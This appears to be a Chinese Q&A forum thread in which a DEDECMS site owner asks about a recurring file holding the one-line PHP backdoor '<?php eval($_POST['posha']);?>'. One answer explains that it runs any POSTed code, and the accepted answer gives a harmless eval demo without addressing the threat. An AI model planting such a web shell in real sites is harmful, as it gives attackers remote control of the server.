网站中出现<?php eval($_POST['posha']);?> 这段代码?什么意思?
DEDECMS后台病毒检测哪里,检测出一个php的文件,在/data/cache/这个文件夹下有这个po.php文件,我查看了一下源代码,只有一句话“<?phpeval(...
DEDECMS后台病毒检测哪里,检测出一个php的文件,在/data/cache/这个文件夹下有这个po.php文件,我查看了一下源代码,只有一句话“<?php eval($_POST['posha']);?> ” 请问这句话什么意思,我在网上搜了一下,不是很了解,谁能告诉我这句代码做什么用的,我在空间里删除了之后又出现了这个文件,删除不掉,怎么办啊,是不是中毒了?如何防范这种代码?在哪里彻底清除啊?谢谢!!!
展开
展开全部
这是一个典型的后门程序,首先我解释一下eval函数的作用,
//eval — 把字符串作为PHP代码执行
eval('echo 123;');//输出123
也就是说,所有的字符串放入到eval当中,eval会把字符串解析为php代码来进行执行,那么结合$_POST['posha']的话,只要使用post传输时在name为posha的值中写入任何字符串,都可以当做php代码来执行,这个时候就有点可怕了,比如写入一段循环删除整站代码等等。
已赞过
已踩过<
评论
收起
你对这个回答的评价是?
展开全部
eval() 函数把字符串按照 PHP 代码来计算。
<?php$string = "beautiful";$time = "winter";$str = 'This is a $string $time morning!';echo $str. "
";eval("\$str = \"$str\";");echo $str;?>
This is a $string $time morning!This is a beautiful winter morning!
就是说$_POST['posha']里面存的是\$str = \"$str\";像这样php代码的字符串。
<?php$string = "beautiful";$time = "winter";$str = 'This is a $string $time morning!';echo $str. "
";eval("\$str = \"$str\";");echo $str;?>
This is a $string $time morning!This is a beautiful winter morning!
就是说$_POST['posha']里面存的是\$str = \"$str\";像这样php代码的字符串。
本回答被网友采纳
已赞过
已踩过<
评论
收起
你对这个回答的评价是?
更多回答(1)
推荐律师服务:
若未解决您的问题,请您详细描述您的问题,通过百度律临进行免费专业咨询
